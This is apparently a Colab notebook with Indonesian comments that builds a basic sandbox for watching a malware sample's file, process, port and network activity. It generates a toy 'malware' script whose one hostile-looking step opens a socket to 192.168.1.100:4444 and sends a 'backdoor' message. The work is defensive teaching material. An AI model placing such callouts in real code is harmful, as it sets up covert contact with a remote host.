<a href="https://colab.research.google.com/github/elangbijak4/Security_Research/blob/main/Tool29_Almudaya_Forensik_Sandbox_for_Malware_Analysis.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [1]:
!pip install pyshark

     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 41.4/41.4 kB 809.2 kB/s eta 0:00:00


In [2]:
!pip install watchdog

     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 83.0/83.0 kB 724.9 kB/s eta 0:00:00


In [3]:
!pip install psutil

In [18]:
import os
import subprocess
import platform
import psutil
import pyshark
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
from pathlib import Path
import time
import socket

In [26]:
# Direktori dan file
MALWARE_DIR = Path("malware")
MALWARE_FILE = MALWARE_DIR / "malware_sample.py"
LOG_FILE = Path("logs/sandbox_log.txt")

In [27]:
# Direktori dan file
MALWARE_DIR = "malware"
MALWARE_FILE = os.path.join(MALWARE_DIR, "malware_sample.py")

# Konten kode malware sederhana
malware_code = """\
import os
import time
import socket

def create_file():
    with open("malware_test.txt", "w") as f:
        f.write("This is a test file created by malware.")

def modify_file():
    with open("malware_test.txt", "a") as f:
        f.write("\\nThis line was added by malware.")

def delete_file():
    if os.path.exists("malware_test.txt"):
        os.remove("malware_test.txt")

def send_backdoor_message(ip, port, message):
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.connect((ip, port))
            s.sendall(message.encode('utf-8'))
            response = s.recv(1024).decode('utf-8')
            print(f"Received response from backdoor server: {response}")
    except Exception as e:
        print(f"Failed to send backdoor message: {str(e)}")

def main():
    create_file()
    time.sleep(2)
    modify_file()
    time.sleep(2)
    delete_file()

    # Kirim pesan backdoor ke IP dan port tertentu
    backdoor_ip = "192.168.1.100"  # Ganti dengan IP yang diinginkan
    backdoor_port = 4444           # Ganti dengan port yang diinginkan
    message = "Malware action completed"
    send_backdoor_message(backdoor_ip, backdoor_port, message)

if __name__ == "__main__":
    main()

"""
# Membuat direktori jika belum ada
if not os.path.exists(MALWARE_DIR):
    os.makedirs(MALWARE_DIR)

# Menulis konten kode ke file malware_sample.py
with open(MALWARE_FILE, "w") as file:
    file.write(malware_code)

print(f"File {MALWARE_FILE} telah dibuat.")

Tue Jul  9 11:46:53 2024: File modified: malware/malware_sample.py
Tue Jul  9 11:46:53 2024: File modified: malware/malware_sample.py
Tue Jul  9 11:46:53 2024: File modified: malware
File malware/malware_sample.py telah dibuat.


In [28]:
# Membuat direktori logs jika belum ada
if not os.path.exists("logs"):
    os.makedirs("logs")

# Membuat file log kosong jika belum ada
if not LOG_FILE.exists():
    with open(LOG_FILE, "w") as f:
        pass

In [29]:
# Fungsi untuk mencatat log dan mencetak ke layar
def log(message):
    with open(LOG_FILE, "a") as log_file:
        log_file.write(f"{time.ctime()}: {message}\n")
    print(f"{time.ctime()}: {message}")

In [8]:
# Fungsi untuk mencatat log
def log2(message):
    with open(LOG_FILE, "a") as log_file:
        log_file.write(f"{time.ctime()}: {message}\n")

In [30]:
# Fungsi untuk memantau proses
def monitor_process(proc):
    try:
        while proc.is_running():
            log(f"Process {proc.pid} is running")
            time.sleep(1)
    except psutil.NoSuchProcess:
        log(f"Process {proc.pid} terminated")
    except Exception as e:
        log(f"Error monitoring process: {str(e)}")

In [31]:
# Fungsi untuk mengamati port yang terbuka
def monitor_open_ports():
    open_ports = []
    for conn in psutil.net_connections():
        if conn.status == 'LISTEN':
            open_ports.append((conn.laddr.ip, conn.laddr.port))
    return open_ports

In [32]:
# Handler untuk memantau perubahan sistem file
class FileChangeHandler(FileSystemEventHandler):
    def on_modified(self, event):
        log(f"File modified: {event.src_path}")
    def on_created(self, event):
        log(f"File created: {event.src_path}")
    def on_deleted(self, event):
        log(f"File deleted: {event.src_path}")

In [33]:
# Fungsi untuk menjalankan malware dalam sandbox
def run_malware():
    try:
        log("Starting malware execution")
        initial_open_ports = monitor_open_ports()
        proc = subprocess.Popen(["python", MALWARE_FILE], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)

        # Gunakan psutil untuk memantau proses
        ps_proc = psutil.Process(proc.pid)
        monitor_process(ps_proc)

        while True:
            output = proc.stdout.readline()
            if output == '' and proc.poll() is not None:
                break
            if output:
                log(output.strip())
                print(output.strip())

        stderr_output = proc.stderr.read()
        if stderr_output:
            log(stderr_output.strip())
            print(stderr_output.strip())

        stdout, stderr = proc.communicate()
        log(f"Malware output:\n{stdout}\n{stderr}")

        final_open_ports = monitor_open_ports()
        newly_open_ports = set(final_open_ports) - set(initial_open_ports)
        if newly_open_ports:
            log(f"Newly opened ports: {newly_open_ports}")

    except Exception as e:
        log(f"Error running malware: {str(e)}")

In [11]:
# Fungsi untuk menjalankan malware dalam sandbox
def run_malware2():
    try:
        log("Starting malware execution")
        proc = subprocess.Popen(["python", MALWARE_FILE], stdout=subprocess.PIPE, stderr=subprocess.PIPE)

        # Gunakan psutil untuk memantau proses
        ps_proc = psutil.Process(proc.pid)
        monitor_process(ps_proc)

        stdout, stderr = proc.communicate()
        log(f"Malware output:\n{stdout.decode()}\n{stderr.decode()}")

    except Exception as e:
        log(f"Error running malware: {str(e)}")

In [16]:
# Fungsi untuk menjalankan malware dalam sandbox
def run_malware2():
    try:
        log("Starting malware execution")
        proc = subprocess.Popen(["python", MALWARE_FILE], stdout=subprocess.PIPE, stderr=subprocess.PIPE)

        # Gunakan psutil untuk memantau proses
        ps_proc = psutil.Process(proc.pid)
        monitor_process(ps_proc)

        stdout, stderr = proc.communicate()
        log(f"Malware output:\n{stdout.decode()}\n{stderr.decode()}")

        # Menulis output yang di print di layar ke file log
        with open(LOG_FILE, "a") as log_file:
            log_file.write(f"Malware stdout:\n{stdout.decode()}")
            log_file.write(f"\nMalware stderr:\n{stderr.decode()}")

    except Exception as e:
        log(f"Error running malware: {str(e)}")

In [34]:
# Fungsi untuk menangkap lalu lintas jaringan
def capture_network_traffic(duration=60):
    capture = pyshark.LiveCapture(interface='eth0')
    capture.sniff(timeout=duration)
    for packet in capture.sniff_continuously(packet_count=10):
        log(f"Packet captured: {packet}")

In [35]:
!apt-get install tshark

Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
tshark is already the newest version (3.6.2-2).
0 upgraded, 0 newly installed, 0 to remove and 45 not upgraded.


In [36]:
import asyncio

In [37]:
async def capture_network_traffic_async(duration=60):
    capture = pyshark.LiveCapture(interface='eth0')
    await capture.sniff(timeout=duration)
    async for packet in capture.sniff_continuously(packet_count=10):
        log(f"Packet captured: {packet}")

In [38]:
if __name__ == "__main__":
    # Memulai pemantauan sistem file
    event_handler = FileChangeHandler()
    observer = Observer()
    observer.schedule(event_handler, path=MALWARE_DIR, recursive=True)
    observer.start()

    # Use asyncio.create_task to schedule the coroutine within the existing loop
    asyncio.create_task(capture_network_traffic_async())

    # Menjalankan malware
    run_malware()

    # Menghentikan pemantauan sistem file
    observer.stop()
    observer.join()

    log("Sandbox completed")

Tue Jul  9 11:52:46 2024: Starting malware execution
Tue Jul  9 11:52:46 2024: Process 9858 is running
Tue Jul  9 11:52:47 2024: Process 9858 is running
Tue Jul  9 11:52:48 2024: Process 9858 is running
Tue Jul  9 11:52:49 2024: Process 9858 is running
Tue Jul  9 11:52:50 2024: Process 9858 is running
Tue Jul  9 11:52:51 2024: Process 9858 is running
Tue Jul  9 11:52:52 2024: Process 9858 is running
Tue Jul  9 11:52:53 2024: Process 9858 is running
Tue Jul  9 11:52:54 2024: Process 9858 is running
Tue Jul  9 11:52:55 2024: Process 9858 is running
Tue Jul  9 11:52:56 2024: Process 9858 is running
Tue Jul  9 11:52:57 2024: Process 9858 is running
Tue Jul  9 11:52:58 2024: Process 9858 is running
Tue Jul  9 11:52:59 2024: Process 9858 is running
Tue Jul  9 11:53:00 2024: Process 9858 is running
Tue Jul  9 11:53:01 2024: Process 9858 is running
Tue Jul  9 11:53:02 2024: Process 9858 is running
Tue Jul  9 11:53:03 2024: Process 9858 is running
Tue Jul  9 11:53:04 2024: Process 9858 is runni

KeyboardInterrupt: 